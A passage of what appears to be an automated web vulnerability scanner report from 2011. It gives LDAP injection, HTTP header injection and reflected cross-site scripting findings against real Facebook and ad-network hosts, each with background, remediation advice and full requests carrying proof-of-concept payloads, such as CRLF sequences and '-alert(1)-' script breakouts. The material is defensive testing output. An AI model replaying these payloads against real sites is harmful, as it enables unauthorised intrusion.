<script>onloadhooks=[];onloadRegister=function(a){onloadhooks.push(a);};onafterloadhooks=[];onafterloadRegister=function(a){onafterloadhooks.push(a);};var AsyncLoader=(function(){var e=document.getElementsByTagName('head')[0],g=0,f=false,b=function(){if(document.readyState in {loaded:1,complete:1}){document.detachEvent("onreadystatechange",b);a('t_domcontent');}},c=function(){g--;d();},d=function(){if(g===0&&f===true){_onloadHook();a('t_layout');a('t_onload');_onafterloadHook();}},a=function(h){if(CavalryLogger)CavalryLogger.getInstance().setTimeStamp(h);};return {load:function(h){var i=0,j;for(;i<h.length;i++){j=document.createElement('script');j.src=h[i];j.async=true;j.onload=c;j.onreadystatechange=function(){if(j.readyState in {loaded:1,complete:1}){c();j.onreadystatechange=null;}};g++;e.appendChild(j);}window.onload=function(){f=true;d();};if(CavalryLogger)if(window.addEventListener){window.addEventListener('DOMContentLoaded',function(){a('t_domcontent');},false);}else if(document.attachEvent)document.attachEvent("onreadystatechange",b);},loadCSS:function(h){var i=document.createElement('link');i.rel="stylesheet";i.type="text/css";i.media="all";i.href=h;e.appendChild(i);}};})();
AsyncLoader.load(["http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y3\/r\/4M_1PP4LZN8.js"]);</script></head><body class="plugin transparent_widget ff3 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4e25ecd01fc876681075271" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_lik
...[SNIP]...

2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The datr cookie appears to be vulnerable to LDAP injection attacks.

The payloads ddad234c5be87454)(sn=* and ddad234c5be87454)!(sn=* were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ddad234c5be87454)(sn=*; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.48.45
X-Cnection: close
Date: Tue, 19 Jul 2011 18:38:37 GMT
Content-Length: 6945

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/gn-vukSYjxu.css" />
<script>onloadhooks=[];onloadRegister=function(a){onloadhooks.push(a);};onafterloadhooks=[];onafterloadRegister=function(a){onafterloadhooks.push(a);};var AsyncLoader=(function(){var e=document.getElementsByTagName('head')[0],g=0,f=false,b=function(){if(document.readyState in {loaded:1,complete:1}){document.detachEvent("onreadystatechange",b);a('t_domcontent');}},c=function(){g--;d();},d=function(){if(g===0&&f===true){_onloadHook();a('t_layout');a('t_onload');_onafterloadHook();}},a=function(h){if(CavalryLogger)CavalryLogger.getInstance().setTimeStamp(h);};return {load:function(h){var i=0,j;for(;i<h.length;i++){j=document.createElement('script');j.src=h[i];j.async=true;j.onload=c;j.onreadystatechange=function(){if(j.readyState in {loaded:1,complete:1}){c();j.onreadystatechange=null;}};g++;e.appendChild(j);}window.onload=function(){f=true;d();};if(CavalryLogger)if(window.addEventListener){window.addEventListener('DOMContentLoaded',function(){a('t_domcontent');},false);}else if(document.attachEvent)document.attachEvent("onreadystatechange",b);},loadCSS:function(h){var i=document.createElement('link');i.rel="stylesheet";i.type="text/css";i.media="all";i.href=h;e.appendChild(i);}};})();
AsyncLoader.load(["http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y3\/r\/4M_1PP4LZN8.js"]);</script></head><body class="plugin transparent_widget safari4 win Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4e25cf2dda74b9297241635" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></
...[SNIP]...

Request 2

GET /plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ddad234c5be87454)!(sn=*; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.174.25
X-Cnection: close
Date: Tue, 19 Jul 2011 18:38:38 GMT
Content-Length: 25372

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embed}
h1, h2, h3, h4, h5, h6{font-size: 13px;color:#333;margin:0;padding:0}
h1{font-size: 14px}
h4, h5{font-size: 11px}
p{margin:1em 0}
a{cursor:pointer;color:#3b5998;-moz-outline-style:none;text-decoration:none}
a:hover{text-decoration:underline}
img{border:0}
td,
td.label{font-size: 11px;text-align:left}
dd{color:#000}
dt{color:#777}
ul{list-style-type:none;margin:0;padding:0}
abbr{border-bottom:none}
hr{background:#d9d9d9;border-width:0;color:#d9d9d9;height:1px}
.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}
.clearfix{display:block;zoom:1}
.datawrap{word-wrap:break-word}
.word_break{display:block;float:left;margin-left:-10px;padding:0}
.img_loading{position:absolute;left:-100000px;top:-100000px}
.aero{opacity:.5}
.column{float:left}
.center{margin-left:auto;margin-right:auto}
#facebook .hidden_elem{display:none !important}
#facebook .invisible_elem{visibility:hidden}
.direction_ltr{direction:ltr}
.direction_rtl{direction:rtl}
.text_align_ltr{text-align:left}
.text_align_rtl{text-align:right}
body.plugin{background:transparent;overflow-y:visible}
body.transparent_widget{background-color:transparent;overflow:hidden}
body.plugin.transparent_widget{overflow-y:hidden}
.connect_widget{background-color:transparent}
.connect_widget .connect_widget_facebook_favicon{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png) no-repeat -1px -47px transparent;display:block;height:14px;padding:0 0 0 0;width:14px;position:absolute;left:-1px}
.connect_widget .connect_widget_interactive_area{border-collapse:collapse}
.connect_widget td.connect_widget_vertical_center{border-spacing:0;font-size: 11px;line-height:normal;padding:0}
.connect_widget td.connect_widget_button_cell{vertical-align:top}
.connect_widget td.connect_widget_co
...[SNIP]...

3. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.NetMining/B5146585.127

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d907%0d%0aabe9ed35d54 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d907%0d%0aabe9ed35d54/N1558.NetMining/B5146585.127;sz=728x90;pc=%5BTPAS_ID%5D;ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d907
abe9ed35d54
/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http: //ads.undertone.com/c
Date: Tue, 19 Jul 2011 20:43:37 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/adj/cm.quadbostonglobe/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.quadbostonglobe/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f343%0d%0a9db56c3167b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f343%0d%0a9db56c3167b/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=340;dc=w;btg=bz.25;ord=1311108273? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f343
9db56c3167b
/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=340;dc=w;btg=bz.25;ord=1311108273:
Date: Tue, 19 Jul 2011 20:46:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://matcher.bidder7.mookie1.com/google [cver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /google

Issue detail

The value of the cver request parameter is copied into the X-ZAMA-MATCHER-ERROR response header. The payload e9da1%0d%0a3ed374399eb was submitted in the cver parameter. This caused a response containing an injected HTTP header.

Request

GET /google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=e9da1%0d%0a3ed374399eb&can=ffffffffffffffff HTTP/1.1
Host: matcher.bidder7.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1; RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE|U10Vu1|U10WDN; id=2814750682866683; session=1311100565|1311100565

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-ZAMA-MATCHER-ERROR: google has sent non numeric (or zero) cver 'e9da1
3ed374399eb
'
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4. Cross-site scripting (reflected)  previous  next
There are 151 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://a.collective-media.net/adj/cm.quadbostonglobe/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonglobe/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 424e5'-alert(1)-'0d82f8283ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonglobe424e5'-alert(1)-'0d82f8283ff/;sz=160x600;ord=1311108273? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Tue, 19 Jul 2011 20:44:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:43 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.quadbostonglobe424e5'-alert(1)-'0d82f8283ff/;sz=160x600;net=cm;ord=1311108273;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/cm.quadbostonglobe/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonglobe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 944bf'-alert(1)-'38ad345cf2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonglobe/;sz=160x600;ord=1311108273?&944bf'-alert(1)-'38ad345cf2b=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:41 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:41 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.quadbostonglobe/;sz=160x600;net=cm;ord=1311108273?&944bf'-alert(1)-'38ad345cf2b=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.quadbostonglobe/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonglobe/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 681b5'-alert(1)-'892d1bce44a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonglobe/;sz=160x600;ord=1311108273?681b5'-alert(1)-'892d1bce44a HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Tue, 19 Jul 2011 20:44:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:37 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/cm.quadbostonglobe/;sz=160x600;net=cm;ord=1311108273?681b5'-alert(1)-'892d1bce44a;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 668d1'-alert(1)-'767c5f8121b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston668d1'-alert(1)-'767c5f8121b/be_bus;sz=160x600;ord=1807584008? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Tue, 19 Jul 2011 20:44:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 20:44:34 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston668d1'-alert(1)-'767c5f8121b/be_bus;sz=160x600;net=q1;ord=1807584008;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://a.collective-media.net/adj/q1.q.boston/be_bus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_bus

Issue detail

